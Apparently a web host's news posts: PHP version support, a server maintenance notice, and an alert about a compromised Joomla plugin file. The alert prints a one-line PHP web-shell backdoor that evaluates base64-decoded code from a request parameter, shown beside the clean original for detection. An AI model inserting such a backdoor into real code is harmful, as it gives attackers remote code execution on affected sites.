Whplus Support multi versi PHP

Kami sampaikan bahwa saat ini Whplus telah mendukung berbagai macam versi PHP. Server kami mendukung versi PHP 5 mulai dari 5.2, 5.3, 5.4, dan 5.5. Untuk mengganti versi PHP yang digunakan, anda dapat login ke cPanel, kemudian pilih “Select PHP Version”.

Posted in News. Comments Off on Whplus Support multi versi PHP

Maintenance Server s02us

Disampaikan bahwa kami akan melakukan maintenance server
s02us (ip 67.222.149.30) pada hari jumat 22/3/2013 mulai pukul 21.00 WIB, untuk sementara mungkin akses ke server
akan sedikit terganggu.

Kami mohon maaf atas ketidaknyamanan ini.

Posted in News. Comments Off on Maintenance Server s02us

dvmessages.php is being reported as phishing file?

Please be aware that there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity.

The original dvmessages.php file is look like this:

<?php
/**

*/

// no direct access
defined( ‘_JEXEC’ ) or die( ‘Restricted access’ );

jimport( ‘joomla.plugin.plugin’ );

But on the “infected” dvmessages.php

<?php
defined( ‘_JEXEC’ ) or die(@eval(base64_decode($_REQUEST[‘c_id’])));
jimport( ‘joomla.plugin.plugin’ );